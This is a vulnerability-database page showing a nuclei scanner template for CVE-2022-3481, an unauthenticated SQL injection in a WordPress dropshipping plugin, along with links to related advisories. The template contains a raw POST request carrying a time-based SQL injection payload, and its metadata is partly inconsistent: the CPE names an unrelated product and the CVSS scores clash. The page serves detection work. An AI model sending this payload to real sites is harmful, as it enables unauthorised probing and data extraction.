Lucene search
K

NotificationX Dropshipping < 4.4 - SQL Injection

🗓️ 06 Jul 2026 03:02:03Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 13 Views

NotificationX Dropshipping below version 4.4 has unauthenticated SQL injection via a REST endpoint.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2022-3481
7 Nov 202216:11
circl
CNNVD
WordPress plugin WooCommerce Dropshipping SQL注入漏洞
7 Nov 202200:00
cnnvd
CVE
CVE-2022-3481
7 Nov 202200:00
cve
Cvelist
CVE-2022-3481 WooCommerce Dropshipping < 4.4 - Unauthenticated SQLi
7 Nov 202200:00
cvelist
EUVD
EUVD-2022-42853
7 Nov 202200:00
euvd
NVD
CVE-2022-3481
7 Nov 202210:15
nvd
OSV
CVE-2022-3481
7 Nov 202210:15
osv
Patchstack
WordPress WooCommerce Dropshipping premium plugin <= 4.3 - Unauthenticated SQL Injection (SQLi) vulnerability
17 Oct 202200:00
patchstack
Prion
Sql injection
7 Nov 202210:15
prion
Positive Technologies
PT-2022-22361
7 Nov 202200:00
ptsecurity
Rows per page
id: CVE-2022-3481

info:
  name: NotificationX Dropshipping < 4.4 - SQL Injection
  author: ritikchaddha
  severity: critical
  description: |
    The plugin does not properly sanitise and escape a parameter before using it in a SQL statement via a REST endpoint available to unauthenticated users, leading to a SQL injection
  impact: |
    Unauthenticated attackers can exploit time-based SQL injection through the REST endpoint to extract sensitive WooCommerce data including customer information, order details, and payment records.
  remediation: |
    Update NotificationX Dropshipping plugin to version 4.4 or later that properly sanitizes and escapes parameters in REST endpoints.
  reference:
    - https://wpscan.com/vulnerability/c5e395f8-257e-49eb-afbd-9c1e26045373
    - https://nvd.nist.gov/vuln/detail/CVE-2022-3481
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N
    cvss-score: 4.3
    cve-id: CVE-2022-3481
    cwe-id: CWE-20
    epss-score: 0.03686
    epss-percentile: 0.88351
    cpe: cpe:2.3:a:smartbear:swagger_ui:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    verified: true
    fofa-query: body="/wp-content/plugins/woocommerce-dropshipping"
  tags: cve,cve2022,wordpress,wp-plugin,wp,sqli,woocommerce,notificationx,vkev,vuln

http:
  - raw:
      - |
        @timeout: 30s
        POST /wp-json/woo-aliexpress/v1/product-sku HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"sku":"a\" AND (SELECT 42 FROM (SELECT(SLEEP(7)))wlHd)-- pOeU"}

    matchers:
      - type: dsl
        dsl:
          - 'duration>=7'
          - 'status_code == 200'
          - 'contains(content_type, "application/json")'
          - 'contains_all(body, "code\":", "message\":\"Product", "status\":400")'
        condition: and
# digest: 4a0a0047304502201a170bf652886f6101a418c496df6206a490364ccd52782eb2fc873c6d58ccaa022100dc2457d71bea81dff112fe4e3623036918536857f34af53a08c90fbf2fb6276b:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.2High risk
Vulners AI Score7.2
CVSS 3.19.8
EPSS0.03686
SSVC
13